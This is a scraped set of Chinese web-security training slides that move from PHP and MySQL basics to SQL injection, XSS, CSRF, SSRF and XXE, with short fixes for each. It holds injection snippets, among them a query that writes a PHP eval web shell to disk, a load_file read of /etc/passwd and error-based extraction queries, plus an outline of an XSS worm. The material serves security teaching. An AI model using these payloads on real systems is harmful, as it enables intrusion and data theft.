熱心網(wǎng)友心東工具使用_第1頁(yè)
熱心網(wǎng)友心東工具使用_第2頁(yè)
熱心網(wǎng)友心東工具使用_第3頁(yè)
熱心網(wǎng)友心東工具使用_第4頁(yè)
熱心網(wǎng)友心東工具使用_第5頁(yè)
已閱讀5頁(yè),還剩169頁(yè)未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說(shuō)明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡(jiǎn)介

講師:心東郵箱:

2010年開(kāi)始關(guān)注網(wǎng)絡(luò)安全(腳本小子)

2014年接觸PHP(HTMLCSSJSPHPJS高級(jí)使用原生態(tài)發(fā)送AJAXJqueryDede二次開(kāi)發(fā)等)

2015年在乙方安全公司擔(dān)任信息安全工程師(安全服務(wù))7個(gè)月

2015年接觸python開(kāi)發(fā)

2016年在乙方安全公司當(dāng)然滲透測(cè)試工程師偏向于APT攻擊2年

問(wèn):為什么我要錄培訓(xùn)?

1.表達(dá)能力

2.當(dāng)講師是我小時(shí)候的理想

3.復(fù)習(xí)PHP

4.反正在家也沒(méi)什么事做

http協(xié)議簡(jiǎn)單回顧請(qǐng)求的流程是怎么樣?請(qǐng)求頭會(huì)包含哪些信息?響應(yīng)頭會(huì)包含哪些信息?什么是服務(wù)器?服務(wù)器有哪些?Apachenginxiis等Apache跟php的區(qū)別在哪?Mysql的區(qū)別又在哪?搭建WEB服務(wù)器首先準(zhǔn)備的安裝包1.apache2.php3.mysqlPhp語(yǔ)法<?php//此處是PHP代碼?>PHP變量<?php//此處是PHP代碼?>PHP變量規(guī)則:變量以$符號(hào)開(kāi)頭,其后是變量的名稱變量名稱必須以字母或下劃線開(kāi)頭變量名稱不能以數(shù)字開(kāi)頭變量名稱只能包含字母數(shù)字字符和下劃線(A-z、0-9以及_)變量名稱對(duì)大小寫(xiě)敏感($y與$Y是兩個(gè)不同的變量)PHP變量引用//php引用變量:不同變量名指向同一地址。輸出信息EchoPrint_rvar_dump等數(shù)據(jù)類型1.字符串2.整型3.浮點(diǎn)型4.邏輯5.數(shù)組6.對(duì)象7.null字符串函數(shù)strlen()函數(shù)返回字符串的長(zhǎng)度,以字符計(jì)。strpos()函數(shù)用于檢索字符串內(nèi)指定的字符或文本。

PHP常量PHP常量常量是單個(gè)值的標(biāo)識(shí)符(名稱)。在腳本中無(wú)法改變?cè)撝?。有效的常量名以字符或下劃線開(kāi)頭(常量名稱前面沒(méi)有$符號(hào))。注釋:與變量不同,常量貫穿整個(gè)腳本是自動(dòng)全局的。設(shè)置PHP常量如需設(shè)置常量,請(qǐng)使用define()函數(shù)-它使用三個(gè)參數(shù):首個(gè)參數(shù)定義常量的名稱第二個(gè)參數(shù)定義常量的值可選的第三個(gè)參數(shù)規(guī)定常量名是否對(duì)大小寫(xiě)不敏感。默認(rèn)是false。PHP運(yùn)算符(看筆記)PHPif...else...elseif語(yǔ)句PHP條件語(yǔ)句在PHP中,我們可以使用以下條件語(yǔ)句:if語(yǔ)句

-如果指定條件為真,則執(zhí)行代碼if...else語(yǔ)句

-如果條件為true,則執(zhí)行代碼;如果條件為false,則執(zhí)行另一端代碼if...elseifelse語(yǔ)句

-選擇若干段代碼塊之一來(lái)執(zhí)行switch語(yǔ)句

-語(yǔ)句多個(gè)代碼塊之一來(lái)執(zhí)行switchSwitch語(yǔ)句如果您希望有選擇地執(zhí)行若干代碼塊之一,請(qǐng)使用Switch語(yǔ)句。使用Switch語(yǔ)句可以避免冗長(zhǎng)的if..elseif..else代碼塊。switch(1){ case1: #code... break;

default: #code... break;}while循環(huán)只要指定的條件為真,while循環(huán)就會(huì)執(zhí)行代碼塊。while(1){ #code...}continue

跳出本次循環(huán)break

跳出整個(gè)循環(huán)PHPfor循環(huán)PHPfor循環(huán)執(zhí)行代碼塊指定的次數(shù)for(initcounter;testcounter;incrementcounter){codetobeexecuted;}initcounter:初始化循環(huán)計(jì)數(shù)器的值testcounter::評(píng)估每個(gè)循環(huán)迭代。如果值為TRUE,繼續(xù)循環(huán)。如果它的值為FALSE,循環(huán)結(jié)束。incrementcounter:增加循環(huán)計(jì)數(shù)器的值<?phpfor($x=0;$x<=10;$x++){echo"數(shù)字是:$x<br>";}?>什么是函數(shù)?其實(shí)說(shuō)白了函數(shù)就是一個(gè)半自動(dòng)化機(jī)器人就是一個(gè)存儲(chǔ)代碼的一個(gè)盒子。你想使用他的時(shí)候就按一下開(kāi)關(guān)。定義函數(shù)functionfunctionName(){

被執(zhí)行的代碼;}函數(shù)名能夠以字母或下劃線開(kāi)頭(而非數(shù)字)。函數(shù)名對(duì)大小寫(xiě)不敏感。函數(shù)名應(yīng)該能夠反映函數(shù)所執(zhí)行的任務(wù)。在下面的例子中,我們創(chuàng)建名為"writeMsg()"的函數(shù)。打開(kāi)的花括號(hào)({)指示函數(shù)代碼的開(kāi)始,而關(guān)閉的花括號(hào)(})指示函數(shù)的結(jié)束。此函數(shù)輸出"Helloworld!"。如需調(diào)用該函數(shù),只要使用函數(shù)名即可:形參跟實(shí)參靜態(tài)變量functiondemo(){ static$i=1;}1.在函數(shù)執(zhí)行完后,變量值仍然保存2.修飾屬性或方法,可以通過(guò)類名訪問(wèn),如果是修飾的是類的屬性,保留值函數(shù)傳參functiondemo($name,$edu){ echo'hello'.$name;}默認(rèn)情況下,函數(shù)參數(shù)通過(guò)值傳遞(因而即使在函數(shù)內(nèi)部改變參數(shù)的值,它并不會(huì)改變函數(shù)外部的值)。如果希望允許函數(shù)修改它的參數(shù)值,必須通過(guò)引用傳遞參數(shù)。內(nèi)部變量與外部變量PHP中的全局變量global和$GLOBALS的區(qū)別?

1.global

Global的作用是定義全局變量,但是這個(gè)全局變量不是應(yīng)用于整個(gè)網(wǎng)站,而是應(yīng)用于當(dāng)前頁(yè)面,包括include或require的所有文件。但是在函數(shù)體內(nèi)定義的global變量,函數(shù)體內(nèi)可以使用,在函數(shù)體外定義的global變量不能在函數(shù)體內(nèi)使用,具體看下面示例。2.$GLOBALS在$GLOBALS數(shù)組中,每一個(gè)變量為一個(gè)元素,鍵名對(duì)應(yīng)變量名,值對(duì)應(yīng)變量的內(nèi)容。$GLOBALS之所以在全局范圍內(nèi)存在,是因?yàn)?GLOBALS是一個(gè)超全局變量。注意$GLOBALS的寫(xiě)法,比如變量$a1,寫(xiě)法為$GLOBALS['a1']。函數(shù)的returnfunctiondemo(){ return1;}引用傳參方式functiondemo(&變量名){}引用傳遞(pass-by-reference)過(guò)程中,被調(diào)函數(shù)的形式參數(shù)雖然也作為局部變量在堆棧中開(kāi)辟了內(nèi)存空間,但是這時(shí)存放的是由主調(diào)函數(shù)放進(jìn)來(lái)的實(shí)參變量的地址。被調(diào)函數(shù)對(duì)形參的任何操作都被處理成間接尋址,即通過(guò)堆棧中存放的地址訪問(wèn)主調(diào)函數(shù)中的實(shí)參變量。正因?yàn)槿绱耍徽{(diào)函數(shù)對(duì)形參做的任何操作都影響了主調(diào)函數(shù)中的。同理跟變量引用的原理是一樣的引用函數(shù)function&demo(){ static$i=0; echo$i;} $i++; return$i;demo();$b=&demo();$b=500;demo();跟上次一樣,都是指向一個(gè)內(nèi)存,只不過(guò)他是通過(guò)return來(lái)指向的。數(shù)組什么是數(shù)組?數(shù)組就是在內(nèi)存里有一塊連續(xù)的內(nèi)存空間(堆空間),這里面可以保存多個(gè)數(shù)據(jù),數(shù)據(jù)沒(méi)有數(shù)據(jù)類型的限制。數(shù)組基本語(yǔ)法*第一種$arr=array(元素1,元素2,元素3…);

//數(shù)據(jù)類型一定是數(shù)組*第二種$arr[]=元素1;

//定義一個(gè)$arr變量,將元素1添加進(jìn)來(lái)$arr[]=元素2;

//將元素2添加到$arr變量中訪問(wèn)數(shù)組數(shù)組本質(zhì)是變量,訪問(wèn)的時(shí)候就是直接使用變量,但是因?yàn)閿?shù)組元素有多個(gè),而系統(tǒng)沒(méi)有辦法直接區(qū)分到底用戶是訪問(wèn)的哪一個(gè),所以需要用戶在訪問(wèn)數(shù)組的時(shí)候,使用數(shù)組下標(biāo)(鍵名)語(yǔ)法:$數(shù)組變量[下標(biāo)]數(shù)值下標(biāo):$arr[數(shù)值]字符串下標(biāo):$arr[‘字符串’]數(shù)組分類根據(jù)數(shù)組的下標(biāo)的不同進(jìn)行分類索引數(shù)組:當(dāng)前數(shù)組的下標(biāo)(鍵名)全是數(shù)字(整型)關(guān)聯(lián)數(shù)組:當(dāng)前數(shù)組的下標(biāo)全是字符串(使用最多)混合數(shù)組:數(shù)組的下標(biāo)既有數(shù)字又有字符串

索引數(shù)組定義方式:系統(tǒng)自動(dòng)分配下標(biāo)定義方式:用戶手動(dòng)分配下標(biāo)系統(tǒng)分配所引方式1.系統(tǒng)是0開(kāi)始分配下標(biāo),依次遞增12.用戶可以手動(dòng)分配下標(biāo)(下標(biāo)不能重復(fù):重復(fù)的效果就是覆蓋)3.如果用戶在某一處指定了下標(biāo),那么后續(xù)元素自動(dòng)分配的下標(biāo)從前面的最大值(索引)開(kāi)始關(guān)聯(lián)數(shù)組關(guān)聯(lián)數(shù)組1.下標(biāo)必須使用引號(hào)包含2.下標(biāo)不允許重復(fù),重復(fù)會(huì)覆蓋索引數(shù)組遍歷for要求:1.數(shù)組必須是索引數(shù)組2.所以必須是連續(xù)的索引3.索引必須從0開(kāi)始才可以用for關(guān)聯(lián)或索引數(shù)組遍歷

如果數(shù)組是一個(gè)關(guān)聯(lián)數(shù)組,那么就完全不能使用for循環(huán)來(lái)進(jìn)行遍歷。PHP提供了一個(gè)foreach來(lái)實(shí)現(xiàn)對(duì)數(shù)組元素的遍歷語(yǔ)法:foreach(數(shù)組as鍵值對(duì)$key=>$value){

//使用$key當(dāng)做當(dāng)前元素的下標(biāo)

//使用$value當(dāng)做當(dāng)前元素的值}循環(huán)原理each()沒(méi)有循環(huán)的指針$arr=array('demo1'=>'woaini','demo2'=>2222,'demo3'=>333,'demo4'=>'vvvvv');var_dump(each($arr));//指針1var_dump(each($arr));//指針2var_dump(each($arr));var_dump(each($arr));List的用法list($first,$second,$third)=array('woaini','xihuanni','aisini');二維數(shù)組array(‘person1’=>array(‘name’=>‘張無(wú)忌’,’age’=>20,’power’=>‘九陽(yáng)神功’),‘person2’=>array(‘name’=>‘周芷若’,’age’=>18,’power’=>‘九陰白骨爪’));說(shuō)白了就是數(shù)組里含有數(shù)組就是二位數(shù)組如果再還有數(shù)組就是三維數(shù)組。。。同理依次往前推,數(shù)組有多少個(gè)數(shù)組就是多少維數(shù)組再看一下印象筆記數(shù)組的比較跟相關(guān)函數(shù)什么是時(shí)間戳?時(shí)間戳是自1970年1月1日(00:00:00GMT)以來(lái)的秒數(shù)。它也被稱為Unix時(shí)間戳(UnixTimestamp)。Unix時(shí)間戳(Unixtimestamp),或稱Unix時(shí)間(Unixtime)、POSIX時(shí)間(POSIXtime),是一種時(shí)間表示方式,定義為從格林威治時(shí)間1970年01月01日00時(shí)00分00秒起至現(xiàn)在的總秒數(shù)。Unix時(shí)間戳不僅被使用在Unix系統(tǒng)、類Unix系統(tǒng)中,也在許多其他操作系統(tǒng)中被廣泛采用。獲取時(shí)間戳Time()

//獲取當(dāng)前時(shí)間戳Date//時(shí)間戳轉(zhuǎn)換日期時(shí)間時(shí)間戳轉(zhuǎn)日期Y:年(四位數(shù))大寫(xiě)

m:月(兩位數(shù),首位不足補(bǔ)0)

小寫(xiě)

d:日(兩位數(shù),首位不足補(bǔ)0)

小寫(xiě)

H:小時(shí)帶有首位零的24小時(shí)小時(shí)格式

h:小時(shí)帶有首位零的12小時(shí)小時(shí)格式

i:帶有首位零的分鐘

s:帶有首位零的秒(00-59)

a:小寫(xiě)的午前和午后(am或pm)var_dump(date('Y-m-dH:i:s',1502204401));var_dump(date('Y-m-dh:i:s',1502204401));打開(kāi)或者創(chuàng)建文件fopen()的第一個(gè)參數(shù)包含被打開(kāi)的文件名,第二個(gè)參數(shù)規(guī)定打開(kāi)文件的模式。$myfile=fopen("webdictionary.txt","r")ordie("Unabletoopenfile!");讀文件Fgets($find)//讀第一行文件Fread($find,獲取字節(jié))//指定獲取內(nèi)容Filesize($find)//獲取文件字節(jié)Fclose($find)//關(guān)閉資源修改或添加內(nèi)容Fopen(./1.xx,“a+”);Fwrite(‘文件’,’內(nèi)容’);Fclose(find);//關(guān)閉資源刪除文件unlinkGet請(qǐng)求跟post請(qǐng)求區(qū)別原理區(qū)別一般我們?cè)跒g覽器輸入一個(gè)網(wǎng)址訪問(wèn)網(wǎng)站都是GET請(qǐng)求;再FORM表單中,可以通過(guò)設(shè)置Method指定提交方式為GET或者POST提交方式,默認(rèn)為GET提交方式。HTTP定義了與服務(wù)器交互的不同方法,其中最基本的四種:GET,POST,PUT,DELETE,HEAD,其中GET和HEAD被稱為安全方法,因?yàn)槭褂肎ET和HEAD的HTTP請(qǐng)求不會(huì)產(chǎn)生什么動(dòng)作。不會(huì)產(chǎn)生動(dòng)作意味著GET和HEAD的HTTP請(qǐng)求不會(huì)在服務(wù)器上產(chǎn)生任何結(jié)果。但是安全方法并不是什么動(dòng)作都不產(chǎn)生,這里的安全方法僅僅指不會(huì)修改信息。根據(jù)HTTP規(guī)范,POST可能會(huì)修改服務(wù)器上的資源的請(qǐng)求。比如CSDN的博客,用戶提交一篇文章或者一個(gè)讀者提交評(píng)論是通過(guò)POST請(qǐng)求來(lái)實(shí)現(xiàn)的,因?yàn)樵偬峤晃恼禄蛘咴u(píng)論提交后資源(即某個(gè)頁(yè)面)不同了,或者說(shuō)資源被修改了,這些便是“不安全方法”。PHP接受GET請(qǐng)求跟POST請(qǐng)求三元運(yùn)算符MYSQL綜合創(chuàng)建數(shù)據(jù)庫(kù)創(chuàng)建表字段

添加數(shù)據(jù)

修改數(shù)據(jù)清空數(shù)據(jù)刪除數(shù)據(jù)

備份數(shù)據(jù)數(shù)據(jù)類型自增型搜索關(guān)鍵字分頁(yè)Mysqlnotnull跟default的使用Createtableadmin2(Usernamevarchar(20)notnull,Passworldvarchar(20)nulldefault1);Mysql數(shù)據(jù)類型文件包含其實(shí)說(shuō)白了就是寫(xiě)好了HTML款入到PHP里。。PHP操作MYSQL什么是面向?qū)ο螅坷斫饩秃?,安全行業(yè)懂代碼并不需要開(kāi)發(fā)。COOKIE與session1.什么是cookie2.什么是session3.session操作Cookie跨域默認(rèn)的,cookie只能對(duì)當(dāng)前域名(完整域名:有效的二級(jí)域名)有效。cookie跨域:指的是允許cookie在不同的二級(jí)域名之間共享。(一級(jí)域名一致)PHP設(shè)置COOKIESetcookie(“名字”,值,有效時(shí)間,‘有效路徑’,“有效域");Setcookie("PHPSESSID",session_id(),time()+100,'/',"");文件上傳講師:心東郵箱:

2010年開(kāi)始關(guān)注網(wǎng)絡(luò)安全(腳本小子)

2014年在廣州創(chuàng)智博客培訓(xùn)PHP半年(HTMLCSSJSPHPJS高級(jí)使用原生態(tài)發(fā)送AJAXJqueryDede二次開(kāi)發(fā)等)

2015年在乙方安全公司擔(dān)任信息安全工程師(安全服務(wù))7個(gè)月

2015年接觸python開(kāi)發(fā)

2016年在乙方安全公司當(dāng)然滲透測(cè)試工程師偏向于APT攻擊2年

問(wèn):為什么我要錄培訓(xùn)?

1.表達(dá)能力

2.當(dāng)講師是我小時(shí)候的理想

3.復(fù)習(xí)PHP

4.反正在家也沒(méi)什么事做

什么是SQL注入?當(dāng)客戶端提交的數(shù)據(jù)未做處理或轉(zhuǎn)義直接帶入數(shù)據(jù)庫(kù)就造成了SQL注入。1.布爾注入//返回真或假2.聯(lián)合注入//一起查詢3.延時(shí)注入//定時(shí)器查詢4.報(bào)錯(cuò)注入//報(bào)錯(cuò)但是信息是我們想要的SQL注入之聯(lián)合注入orderby*groupby*利用內(nèi)置函數(shù)暴數(shù)據(jù)庫(kù)信息version()查看數(shù)據(jù)庫(kù)版本database()查看當(dāng)前數(shù)據(jù)庫(kù)名user()查看當(dāng)前用戶查看表:SelectTABLE_NAMEfrominformation_schema.TABLESwhereTABLE_SCHEMA=database()可十六進(jìn)制查看字段:selectCOLUMN_NAMEfrominformation_schema.COLUMNSwhereTABLE_NAME=‘biaoming’;數(shù)據(jù)注入類型注入分為2大類1.整型(沒(méi)有單雙引號(hào))2.字符串(有單雙引號(hào))導(dǎo)出數(shù)據(jù)庫(kù)select‘<?phpeval($_POST[cmd])?>'intooutfile‘物理路徑'讀文件load_file(0x2f6574632f706173737764)錨點(diǎn)的理解#符是干嘛的?為什么要編碼?注入之布爾注入mid(str,1,3)字符串截取ORD()轉(zhuǎn)換成ascii碼Length()統(tǒng)計(jì)字節(jié)長(zhǎng)度version()是查看數(shù)據(jù)庫(kù)版本

database()查看數(shù)據(jù)庫(kù)名user()查看當(dāng)前用戶注入之延時(shí)注入If語(yǔ)法:if(條件,True,False);Select*fromadminwhereid=1andname=if(2>1,”1”,”2”);Sleep(1)注入之理解別名什么是別名?比如你真實(shí)名字叫劉某某小名就叫心東,心東就是你的別名報(bào)錯(cuò)注入之BUG報(bào)錯(cuò)利用數(shù)據(jù)庫(kù)的BUG進(jìn)行利用,看報(bào)錯(cuò)信息不過(guò)報(bào)錯(cuò)的信息就是我們想要的信息只要是count(),rand,groupby三個(gè)連用就會(huì)造成這種報(bào)錯(cuò)left(rand(),3)==不一定報(bào)錯(cuò)floor(rand(0)*2)==一定報(bào)錯(cuò)round(x,d)//x指要處理的數(shù),d是指保留幾位小數(shù)Concat()//字符串拼接selectcount(*),concat(left(rand(),3),"",(selectversion()))xfromr1groupbyx;報(bào)錯(cuò)注入之函數(shù)報(bào)錯(cuò)利用數(shù)據(jù)庫(kù)的BUG進(jìn)行利用,看報(bào)錯(cuò)信息不過(guò)報(bào)錯(cuò)的信息就是我們想要的信息函數(shù)很多比如:updatexmlexpgeometrycollectionpolygonmultipointmultilinestringmultipolygonmultilinestring修補(bǔ)SQL漏洞Addslashes字符串修補(bǔ)Int直接成INT類型判斷是否存在SQL注入整型跟字符串寬字節(jié)注入GB2312、GBK、GB18030、BIG5、Shift_JIS等這些都是常說(shuō)的寬字節(jié),實(shí)際上只有兩字節(jié)。寬字節(jié)帶來(lái)的安全問(wèn)題主要是吃ASCII字符(一字節(jié))的現(xiàn)象。MYSQL的字符集轉(zhuǎn)換過(guò)程3寬字節(jié)注入漏洞原理寬字符是指兩個(gè)字節(jié)寬度的編碼技術(shù),如UNICODE、GBK、BIG5等。當(dāng)MYSQL數(shù)據(jù)庫(kù)數(shù)據(jù)在處理和存儲(chǔ)過(guò)程中,涉及到的字符集相關(guān)信息包括:(1)

character_set_client:客戶端發(fā)送過(guò)來(lái)的SQL語(yǔ)句編碼,也就是PHP發(fā)送的SQL查詢語(yǔ)句編碼字符集。(2)

character_set_connection:MySQL服務(wù)器接收客戶端SQL查詢語(yǔ)句后,在實(shí)施真正查詢之前SQL查詢語(yǔ)句編碼字符集。(3)

character_set_database:數(shù)據(jù)庫(kù)缺省編碼字符集。(4)

character_set_filesystem:文件系統(tǒng)編碼字符集。(5)

character_set_results:SQL語(yǔ)句執(zhí)行結(jié)果編碼字符集。(6)

character_set_server:服務(wù)器缺省編碼字符集。(7)

character_set_system:系統(tǒng)缺省編碼字符集。

(8)

character_sets_dir:字符集存放目錄,一般不要修改。寬字節(jié)對(duì)轉(zhuǎn)義字符的影響發(fā)生在character_set_client=gbk的情況,也就是說(shuō),如果客戶端發(fā)送的數(shù)據(jù)字符集是gbk,則可能會(huì)吃掉轉(zhuǎn)義字符\,從而導(dǎo)致轉(zhuǎn)義消毒失敗。例子3就是一個(gè)存在寬字符注入漏洞的PHP程序。多語(yǔ)句注入用分號(hào)隔開(kāi)Select1;select2;添加型注入SelectUpdateInsertdelete刪除型注入布爾注入延時(shí)注入修改型注入Cdn的理解全稱:ContentDeliveryNetwork或ContentDdistributeNetwork,即內(nèi)容分發(fā)網(wǎng)絡(luò)1.CDN是怎么減輕源站服務(wù)器壓力的?答:CDN能處理整個(gè)網(wǎng)站頁(yè)面的70%~95%的內(nèi)容訪問(wèn)量,從而解決了網(wǎng)站的并發(fā)量,由此減輕了源服務(wù)器的訪問(wèn)壓力,也同時(shí)提升了網(wǎng)站的性能、可擴(kuò)展性以及安全性。2.CDN是怎么實(shí)現(xiàn)加速的?答:將網(wǎng)站原服務(wù)器中的內(nèi)容存儲(chǔ)到分布于各地的緩存服務(wù)(CacheServer)中(也就是CDN的節(jié)點(diǎn)),通過(guò)智能的中心管理系統(tǒng)對(duì)網(wǎng)絡(luò)的動(dòng)態(tài)流量進(jìn)行分配控制,使用戶能以最快的速度從最接近用戶的地方獲得所需的信息,一般的靜態(tài)數(shù)據(jù),如圖片、多媒體資料等將基本從CDN節(jié)點(diǎn)上讀取,這使得從源文件服務(wù)器上讀取的數(shù)據(jù)量大大減少。從而提高用戶訪問(wèn)的響應(yīng)速度和服務(wù)的可用性,解決Internet網(wǎng)絡(luò)擁塞狀況,提高用戶訪問(wèn)網(wǎng)站的響應(yīng)速度。防火墻1.CDN2.硬件防火墻3.軟件防火墻4.程序防火墻Insert,update,delete注入添加刪除修改注入都支持報(bào)錯(cuò)注入判斷注入講師:心東郵箱:

2010年開(kāi)始關(guān)注網(wǎng)絡(luò)安全(腳本小子)

2014年接觸PHP(HTMLCSSJSPHPJS高級(jí)使用原生態(tài)發(fā)送AJAXJqueryDede二次開(kāi)發(fā)等)

2015年在乙方安全公司擔(dān)任信息安全工程師(安全服務(wù))7個(gè)月

2015年接觸python開(kāi)發(fā)

2016年在乙方安全公司當(dāng)然滲透測(cè)試工程師偏向于APT攻擊2年

問(wèn):為什么我要錄培訓(xùn)?

1.表達(dá)能力

2.當(dāng)講師是我小時(shí)候的理想

3.復(fù)習(xí)PHP

4.反正在家也沒(méi)什么事做

什么是XSS?XSS攻擊全稱跨站腳本攻擊,是為不和層疊樣式表(CascadingStyleSheets,CSS)的縮寫(xiě)混淆,故將跨站腳本攻擊縮寫(xiě)為XSS,XSS是一種在web應(yīng)用中的計(jì)算機(jī)安全漏洞,它允許惡意web用戶將代碼植入到提供給其它用戶使用的頁(yè)面中。1、盜取各類用戶帳號(hào),如機(jī)器登錄帳號(hào)、用戶網(wǎng)銀帳號(hào)、各類管理員帳號(hào)2、控制企業(yè)數(shù)據(jù),包括讀取、篡改、添加、刪除企業(yè)敏感數(shù)據(jù)的能力3、盜竊企業(yè)重要的具有商業(yè)價(jià)值的資料4、非法轉(zhuǎn)賬5、強(qiáng)制發(fā)送電子郵件6、網(wǎng)站掛馬7、控制受害者機(jī)器向其它網(wǎng)站發(fā)起攻擊了解JS,ajax什么是JS?答:JS是JavaScript的簡(jiǎn)稱,是一種直譯式腳本語(yǔ)言,是一種動(dòng)態(tài)類型、弱類型、基于原型的語(yǔ)言,內(nèi)置支持類型。它的解釋器被稱為JavaScript引擎,為瀏覽器的一部分,廣泛用于客戶端的腳本語(yǔ)言,最早是在HTML網(wǎng)頁(yè)上使用,用來(lái)給HTML網(wǎng)頁(yè)增加動(dòng)態(tài)功能。什么是AJAX?AJAX是一種用于創(chuàng)建快速動(dòng)態(tài)網(wǎng)頁(yè)的技術(shù)。通過(guò)在后臺(tái)與服務(wù)器進(jìn)行少量數(shù)據(jù)交換,AJAX可以使網(wǎng)頁(yè)實(shí)現(xiàn)異步更新。這意味著可以在不重新加載整個(gè)網(wǎng)頁(yè)的情況下,對(duì)網(wǎng)頁(yè)的某部分進(jìn)行更新。傳統(tǒng)的網(wǎng)頁(yè)(不使用AJAX)如果需要更新內(nèi)容,必需重載整個(gè)網(wǎng)頁(yè)面。有很多使用AJAX的應(yīng)用程序案例:新浪微博、Google地圖、開(kāi)心網(wǎng)等等。發(fā)送ajaxN年沒(méi)敲代,直接復(fù)制筆記的Ajax跨域1、允許單個(gè)域名訪問(wèn)指定某域名()跨域訪問(wèn),則只需在文件頭部添加如下代碼:header('');2、允許多個(gè)域名訪問(wèn)指定多個(gè)域名(、等)跨域訪問(wèn),則只需在文件頭部添加如下代碼:$origin=isset($_SERVER['HTTP_ORIGIN'])?$_SERVER['HTTP_ORIGIN']:'';$allow_origin=array('','');if(in_array($origin,$allow_origin)){header('Access-Control-Allow-Origin:'.$origin);}3、允許所有域名訪問(wèn)允許所有域名訪問(wèn)則只需在文件頭部添加如下代碼:header('Access-Control-Allow-Origin:*');存儲(chǔ)XSS什么是存儲(chǔ)XSS?答:存儲(chǔ)XSS,會(huì)把攻擊者的數(shù)據(jù)存儲(chǔ)在服務(wù)器端,攻擊行為將伴隨著攻擊數(shù)據(jù)一直存在。提交JS攻擊代碼存儲(chǔ)到數(shù)據(jù)庫(kù)然后再輸出、反射型XSS反射型xss攻擊:顧名思義,非持久型xss攻擊是一次性的,僅對(duì)當(dāng)次的頁(yè)面訪問(wèn)產(chǎn)生影響。非持久型xss攻擊要求用戶訪問(wèn)一個(gè)被攻擊者篡改后的鏈接,用戶訪問(wèn)該鏈接時(shí),被植入的攻擊腳本被用戶游覽器執(zhí)行,從而達(dá)到攻擊目的。Dom-xssDOM:不經(jīng)過(guò)后端,DOM—basedXSS漏洞是基于文檔對(duì)象模型DocumentObjeetModel,DOM)的一種漏洞,dom-xss是通過(guò)url傳入?yún)?shù)去控制觸發(fā)的。不跟服務(wù)器通信但是卻能執(zhí)行我們的攻擊JS代碼X-XSS-Protection講解說(shuō)白了就是瀏覽器安全的一個(gè)策略簡(jiǎn)單一句話:header(“X-XSS-Protection:0”);//告訴瀏覽器禁用XSS保護(hù)header("X-XSS-Protection:1");//告訴瀏覽器開(kāi)啟XSS保護(hù)CRLF說(shuō)白了就是響應(yīng)頭注入修補(bǔ)XSS漏洞1.做處理(過(guò)濾)<script>alert(1);</script>><

script2.轉(zhuǎn)義閉合XSS代碼搭建XSS平臺(tái)

講師:心東郵箱:

2010年開(kāi)始關(guān)注網(wǎng)絡(luò)安全(腳本小子)

2014年接觸PHP(HTMLCSSJSPHPJS高級(jí)使用原生態(tài)發(fā)送AJAXJqueryDede二次開(kāi)發(fā)等)

2015年在乙方安全公司擔(dān)任信息安全工程師(安全服務(wù))7個(gè)月

2015年接觸python開(kāi)發(fā)

2016年在乙方安全公司當(dāng)然滲透測(cè)試工程師偏向于APT攻擊2年

問(wèn):為什么我要錄培訓(xùn)?

1.表達(dá)能力

2.當(dāng)講師是我小時(shí)候的理想

3.復(fù)習(xí)PHP

4.反正在家也沒(méi)什么事做

了解CSRFCSRF(Cross-siterequestforgery)跨站請(qǐng)求偽造,也被稱為“OneClickAttack”或者SessionRiding。危害:依靠用戶標(biāo)識(shí)危害網(wǎng)站利用網(wǎng)站對(duì)用戶標(biāo)識(shí)的信任欺騙用戶的瀏覽器發(fā)送HTTP請(qǐng)求給目標(biāo)站點(diǎn)另外可以通過(guò)IMG標(biāo)簽會(huì)觸發(fā)一個(gè)GET請(qǐng)求,可以利用它來(lái)實(shí)現(xiàn)CSRF攻擊。CSRF攻擊演示那昨晚寫(xiě)的漏洞演示。CSRF漏洞修補(bǔ)

防御CSRF攻擊:

目前防御CSRF攻擊主要有三種策略:驗(yàn)證HTTPReferer字段;在請(qǐng)求地址中添加token并驗(yàn)證;在HTTP頭中自定義屬性并驗(yàn)證。XSS蠕蟲(chóng)現(xiàn)在你已經(jīng)學(xué)會(huì)了XSS跟ajax發(fā)送請(qǐng)求的原理,那么你可能想到過(guò)蠕蟲(chóng)傳播。。。一個(gè)QQ空間存在存儲(chǔ)XSS然后發(fā)送一個(gè)AJAX請(qǐng)求提交添加說(shuō)說(shuō)說(shuō)說(shuō)的內(nèi)容就是<scriptsrc=></script>JS內(nèi)容:發(fā)送AJXA請(qǐng)求添加說(shuō)說(shuō)內(nèi)容。Ssrf的了解SSRF(Server-SideRequestForgery:服務(wù)器端請(qǐng)求偽造)是一種由攻擊者構(gòu)造形成由服務(wù)端發(fā)起請(qǐng)求的一個(gè)安全漏洞。一般情況下,SSRF攻擊的目標(biāo)是從外網(wǎng)無(wú)法訪問(wèn)的內(nèi)部系統(tǒng)。(正是因?yàn)樗怯煞?wù)端發(fā)起的,所以它能夠請(qǐng)求到與它相連而與外網(wǎng)隔離的內(nèi)部系統(tǒng))Ssrf攻擊演示自己寫(xiě)好的漏洞環(huán)境演示SSRF漏洞修補(bǔ)1,過(guò)濾返回信息,驗(yàn)證遠(yuǎn)程服務(wù)器對(duì)請(qǐng)求的響應(yīng)是比較容易的方法。如果web應(yīng)用是去獲取某一種類型的文件。那么在把返回結(jié)果展示給用戶之前先驗(yàn)證返回的信息是否符合標(biāo)準(zhǔn)。2,統(tǒng)一錯(cuò)誤信息,避免用戶可以根據(jù)錯(cuò)誤信息來(lái)判斷遠(yuǎn)端服務(wù)器的端口狀態(tài)。3,限制請(qǐng)求的端口為http常用的端口,比如,80,443,8080,8090。4,黑名單內(nèi)網(wǎng)ip。避免應(yīng)用被用來(lái)獲取獲取內(nèi)網(wǎng)數(shù)據(jù),攻擊內(nèi)網(wǎng)。5,禁用不需要的協(xié)議。僅僅允許http和https請(qǐng)求??梢苑乐诡愃朴趂ile:///,gopher://,ftp://等引起的問(wèn)題。了解XXE說(shuō)白了就是XML的一個(gè)實(shí)體注入?;厝グ?xml視頻看一遍)。XXE攻擊演示昨晚寫(xiě)好的漏洞看演示1.可以ssrf2.讀文件3.執(zhí)行命令4.掃描端口相關(guān)文章:

